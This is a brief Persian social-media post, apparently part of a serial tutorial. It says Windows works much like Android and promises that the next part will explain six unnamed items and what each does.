برای ویندوز هم شبیه اندرویده حالا باید توضیحات این 6 رو بدونید که هر کدوم چیه و چه کار میکنه و . . .
توی پارت بعدی
❤🔥1❤1